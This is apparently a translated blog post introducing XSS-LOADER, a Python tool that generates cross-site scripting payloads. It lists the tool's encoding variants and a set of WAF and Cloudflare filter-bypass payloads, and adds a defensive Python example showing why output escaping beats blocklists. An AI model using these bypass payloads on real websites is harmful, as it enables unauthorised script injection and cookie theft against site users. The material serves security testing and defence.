I seem to have been flaking a lot lately, mainly because the lab has been busy and I haven't been able to keep up with projects, so apologies to all you readers. Today I'm introducing an XSS tool: XSS-LOADER.
The tool is written in Python 3 and is quite capable. Let's look at how it is used:
For example, if we select BASIC PAYLOAD,
it then asks us to choose an encoding method:
Roughly the following encodings are supported:
* | 1. UPPER CASE----> <SCRIPT>ALERT(1)</SCRIPT>
* | 2. UPPER AND LOWER CASE----> <ScRiPt>aleRt(1)</ScRiPt>
* | 3. URL ENCODE -----> %3Cscript%3Ealert%281%29%3C%2Fscript%3E
* | 4. HTML ENTITY ENCODE-----> &lt;script&gt;alert(1)&lt;/script&gt;
* | 5. SPLIT PAYLOAD -----> <scri</script>pt>>alert(1)</scri</script>pt>>
* | 6. HEX ENCODE -----> 3c7363726970743e616c6572742831293c2f7363726970743e
* | 7. UTF-16 ENCODE -----> Encode payload to utf-16 format.
* | 8. UTF-32 ENCODE-----> Encode payload to utf-32 format.
* | 9. DELETE TAG -----> ";alert('XSS');//
* | 10. UNICODE ENCODE-----> %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
* | 11. US-ASCII ENCODE -----> ¼script¾alert(1)¼/script¾
* | 12. BASE64 ENCODE -----> PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
* | 13. UTF-7 ENCODE -----> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
* | 14. PARENTHESIS BYPASS -----> <script>alert`1`</script>
* | 15. UTF-8 ENCODE -----> %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE
* | 16. TAG BLOCK BREAKOUT-----> "><script>alert(1)</script>
* | 17. SCRIPT BREAKOUT-----> </script><script>alert(1)</script>
* | 18. FILE UPLOAD PAYLOAD-----> "><script>alert(1)</script>.gif
* | 19. INSIDE COMMENTS BYPASS-----> <!--><script>alert(1)</script>-->
* | 20. MUTATION PAYLOAD-----> <noscript><p title="</noscript><script>alert(1)</script>">
* | 21. MALFORMED IMG-----> <IMG """><script>alert(1)</script>">
* | 22. SPACE BYPASS-----> <img^Lsrc=x^Lonerror=alert('1');>
* | 23. DOWNLEVEL-HIDDEN BLOCK-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* | 24. WAF BYPASS PAYLOADS-----> Show Waf Bypass Payload List
* | 25. CLOUDFLARE BYPASS PAYLOADS-----> Show Cloudflare Bypass Payload
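The encoding menu above is a good illustration of why a filter that looks for the literal string `<script>` in user input is not a defence: every variant the tool offers (case changes, URL encoding, HTML entities, hex, base64, backtick calls) carries the same payload past such a check. The defender's answers are, first, to normalise before inspecting if you do any input-side detection at all, and, second, to rely on context-aware output encoding at render time, which neutralises all of these variants regardless of how the input was dressed up. The following is an added example written for this post, not code from XSS-LOADER or its author; the `VARIANTS` table is constructed from the menu entries above, and `normalize`, `looks_like_script_tag` and `render_text_node` are illustrative names, not functions of the tool.

```python
"""Added example (not part of XSS-LOADER): normalise-then-detect versus
a naive blocklist, and output escaping as the actual fix."""
import base64
import binascii
import html
import re
import urllib.parse

# Constructed sample input: the encoding variants listed in the tool's menu.
VARIANTS = {
    "plain": "<script>alert(1)</script>",
    "upper": "<SCRIPT>ALERT(1)</SCRIPT>",
    "mixed": "<ScRiPt>aleRt(1)</ScRiPt>",
    "url": "%3Cscript%3Ealert%281%29%3C%2Fscript%3E",
    "entity": "&lt;script&gt;alert(1)&lt;/script&gt;",
    "hex": "3c7363726970743e616c6572742831293c2f7363726970743e",
    "base64": "PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
    "backtick": "<script>alert`1`</script>",
}

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def naive_blocklist(s):
    """A case-sensitive literal check: the kind of filter these encodings defeat."""
    return "<script>" in s


def normalize(s, rounds=3):
    """Canonicalise common transport encodings before inspection.
    Decoding repeatedly handles stacked encodings (e.g. URL-encoded entities)."""
    for _ in range(rounds):
        prev = s
        s = urllib.parse.unquote(s)
        s = html.unescape(s)
        if prev == s:
            break
    return s.lower()


def looks_like_script_tag(s):
    """Detection on the normalised form. Hex and base64 bodies are only
    tried when the whole field is a single token of that alphabet."""
    cands = [normalize(s)]
    if re.fullmatch(r"(?:[0-9a-fA-F]{2})+", s):
        cands.append(bytes.fromhex(s).decode("utf-8", "replace").lower())
    if re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s) and len(s) % 4 == 0:
        try:
            decoded = base64.b64decode(s, validate=True)
            cands.append(decoded.decode("utf-8", "replace").lower())
        except (binascii.Error, ValueError):
            pass
    return any(SCRIPT_TAG.search(c) for c in cands)


def render_text_node(user_value):
    """The real mitigation: escape for the HTML text context at output time.
    quote=True also makes the result safe inside a quoted attribute value."""
    return html.escape(user_value, quote=True)


def evaluate():
    """Return {name: (blocklist_hit, normalised_hit, rendered_is_inert)}.
    'inert' means the escaped output contains no raw angle brackets, so the
    browser shows the text instead of parsing a tag."""
    out = {}
    for name, value in VARIANTS.items():
        rendered = render_text_node(value)
        inert = "<" not in rendered and ">" not in rendered
        out[name] = (naive_blocklist(value), looks_like_script_tag(value), inert)
    return out


if __name__ == "__main__":
    for name, (blocked, detected, inert) in evaluate().items():
        print(f"{name:9s} blocklist={blocked!s:5s} normalised={detected!s:5s} inert={inert}")
```

Running it shows the naive blocklist catching only the two variants that contain the exact lowercase string, the normalised detector catching all of them, and output escaping leaving every variant inert. The last column is the one that matters in practice: decoders can always be stacked one level deeper than a detector anticipates, whereas escaping at the point of output does not depend on guessing the attacker's encoding.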
We can take a look at its WAF bypass list:
These are just some built-in bypass payloads; there is also a list aimed at one specific WAF, namely Cloudflare (cf):
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
<svg/onload=alert()//
<a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>
<svg%0Aonauxclick=0;[1].some(confirm)//
<a"/onclick=(confirm)()>click
<a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
<sVg/oNloAd=”JaVaScRiPt:/**\/*\’/”\eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))”>
<iframe src=jaVaScrIpT:eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))>
<a href=”j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(this[‘document’][‘cookie’])”>X</a>
<iframe src=”%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)”>
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)
%253%63svg%2520onload=alert(1)%253%65
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>
<select><noembed></select><script x=’a@b’a>y=’a@b’//a@b%0a\u0061lert(1)</script x>
<a+HREF=’%26%237javascrip%26%239t:alert%26lpar;document.domain)’>
Of course, you can also enter your own payload.
Besides the features above, the tool also has an XSS scanning function:
Batch scanning is supported as well...
Tool address:
https://github.com/capture0x/XSS-LOADER/